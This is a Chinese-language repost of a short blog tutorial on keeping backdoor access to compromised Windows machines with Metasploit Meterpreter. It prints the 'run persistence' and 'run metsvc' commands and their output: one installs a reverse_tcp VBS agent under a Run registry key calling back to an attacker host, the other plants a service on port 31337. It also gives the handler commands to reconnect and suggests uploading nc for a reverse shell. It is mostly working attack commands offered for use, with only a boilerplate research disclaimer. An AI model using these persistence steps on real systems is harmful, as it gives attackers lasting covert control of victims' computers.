1.meterpreter自带脚本
方法1.run presistence
可以使用run presistence -h查看选项:
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=443 [*] Persistent agent script is 609496 bytes long [+] Persistent Script written to C:WINDOWSTEMPzvlYoXnVYFbR.vbs [*] Executing script C:WINDOWSTEMPzvlYoXnVYFbR.vbs [+] Agent executed with PID 3272 [*] Installing into autorun as HKCUSoftwareMicrosoftWindows CurrentVersionRunFCBCUBtLrzFY [+] Installed into autorun as HKCUSoftwareMicrosoftWindows CurrentVersionRunFCBCUBtLrzFY
可以看到添加启动是通过,添加注册表键值,启动的是vbs脚本的后门。
连接:
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/metsvc_bind_tcp payload => windows/metsvc_bind_tcp msf exploit(handler) > set LHOST 192.168.1.139 LHOST => 192.168.1.139 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler...
默认没启动,目标机重启后,可以成功获得meterpreter shell
方法2.run metsvc
执行metsvc 脚本
meterpreter > run metsvc -A [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:WINDOWSTEMP kqaqtcsWhBTbO... [*] >> Uploading metsrv.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... * Installing service metsvc * Starting service Service metsvc successfully installed. [*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...
新建的服务,加自启动(映像名称metsvc.exe,服务metsvc ),连接到后门:
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/metsvc_bind_tcp payload => windows/metsvc_bind_tcp msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > set RHOST 192.168.1.108 RHOST => 192.168.1.108 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler... meterpreter >
成功连接
2.自定义后门
方法1.上传远控
方法2.上传nc或其他反弹shell
摘自:http://zone.wooyun.org/content/2454
留言评论(旧系统):
文章来源于lcx.cc:Metasploit之建立backdoor一二
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论